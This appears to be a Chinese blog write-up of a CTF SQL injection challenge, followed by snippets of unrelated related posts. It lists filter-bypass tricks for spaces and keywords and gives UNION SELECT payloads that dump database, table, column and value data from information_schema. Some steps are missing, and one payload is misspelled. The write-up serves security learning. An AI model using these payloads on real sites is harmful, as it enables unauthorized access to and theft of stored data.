一道CTF題 sql爆破

2021-09-26 09:45:48 字數 1358 閱讀 2005

題目:

'
開啟網頁:

說明存在sql注入。

嘗試了一些常見的繞過操作都不行,過濾了注釋--,空格,and,select等。嘗試用/*11*/繞過

--頁面正常

--頁面正常

--頁面正常

--報錯

以上測試說明表有四列。

測試回顯:

(union也可以大寫)

返回3,說明在第3個位置可控。

爆資料庫:

得到資料庫test。

爆表名:

出現表名:content。

grounp_concat:將group by產生的同乙個分組中的值連線起來,返回乙個字串結果。

concat_ws:將多個字串連線成乙個字串。

爆列:

得到了:id,context,title

爆值:

得到:

pctf

總結:這道題主要是因為過濾了單行注釋和空格,以及對union,select等關鍵字進行了過濾,採取的措施:

1、空格可以使用:0xb或使用多行注釋的/*xx*/)解決;union,select等關鍵字可雙寫,中間重複或者大寫繞過。

兩個空格代替乙個空格,用tab代替空格,%a0=空格:

%20 %09 %0a %0b %0c %0d %a0 %00 /**/  /*!*/

2、爆庫:

union select 1,2,database()
3、爆表:

union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()
4、爆列:

union selcet 1,2,group_concat(column_name) from information_schema.columns where table_name='content'  # 或者等於表的十六進製制
5、爆值:

union select  1,2,group_concat(username,password) from content

一道內部ctf檔案包含題

在burp裡看下 拿到原始碼 很明顯是一道檔案包含題目,包含cookie裡的值,於是構造cookie language chinese試試 檔案變成中文的了,說明中文語言進行了包含並替換 輸入flag試試 這裡發現並不能直接顯示出flag,而很奇怪的一點是之前的那些文字沒了 經過測試這裡只要不是ch...

從一道CTF題看整數溢位

整數溢位漏洞是程式開發過程中危害較大的一種漏洞,經常是pwn中各大神的突破點,利用此跳板,攻入系統,進而攻陷真個系統。此類漏洞不容易發覺,也不容易引起程式設計人員的注意。近期在研究 網鼎盃2020白虎組 的比賽試題中,有一道re逆向題目 惡龍 涉及到整數溢位,如利用此漏洞,可快速拿到flag。本題解...

每日一道SQL題(三)

編寫乙個 sql 查詢來實現分數排名。如果兩個分數相同,則兩個分數排名 rank 相同。請注意,平分後的下乙個名次應該是下乙個連續的整數值。換句話說,名次之間不應該有 間隔 題目鏈結 idscore 13.50 23.65 34.00 43.85 54.00 63.65 例如,根據上述給定的 sco...